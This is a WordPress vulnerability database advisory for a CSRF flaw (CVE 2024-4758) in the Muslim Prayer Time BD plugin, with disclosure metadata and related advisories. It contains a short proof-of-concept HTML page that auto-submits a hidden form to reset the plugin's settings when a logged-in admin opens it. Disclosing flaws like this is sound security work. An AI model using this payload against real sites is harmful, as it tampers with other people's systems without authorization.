Muslim Prayer Time BD < 2.5 – Settings Reset via CSRF | CVE 2024-4758 | Plugin Vulnerabilities

Description

The plugin does not have CSRF check in place when reseting its settings, which could allow attackers to make a logged in admin reset them via a CSRF attack

Proof of Concept

Make a logged in admin open an HTML file containing:

```
<body onload="document.forms[0].submit()">
    <form action="https://example.com/wp-admin/options-general.php?page=muslim-prayer-time-bd%2Fadmin-settings.php" method="post">
        <input type="hidden" name="option_page" value="mptb-settings-group" />
        <input type="hidden" name="clear_all" value="1" />
        <input type="submit" value="Submit" />
    </form>
</body>
```

Affects Plugins

muslim-prayer-time-bd

Fixed in 2.5

References

CVE

Classification

Type

CSRF

OWASP top 10

A2: Broken Authentication and Session Management

CWE

CVSS

Miscellaneous

Original Researcher

Bob Matyas

Submitter

Bob Matyas

Submitter website

https://www.bobmatyas.com

Submitter twitter

Verified

Yes

WPVDB ID

64ec57a5-35d8-4c69-bdba-096c2245a0db

Timeline

Publicly Published

2024-06-05 (about 1 year ago)

Added

2024-06-05 (about 1 year ago)

Last Updated

2025-01-10 (about 11 months ago)

Other

Published

Title

Published

2023-03-17

Title

WP-Advanced-Search < 3.3.9 - Settings Update via CSRF

Published

2024-01-02

Title

WP SMS < 6.5.1 - Cross-Site Request Forgery to Subscriber Deletion

Published

2023-09-22

Title

Brands for WooCommerce < 3.8.2.3 - Cross-Site Request Forgery

Published

2025-06-27

Title

Burst Statistics < 2.0.8 - Cross-Site Request Forgery

Published

2024-11-22

Title

Simple Travel Map <= 0.1 - Cross-Site Request Forgery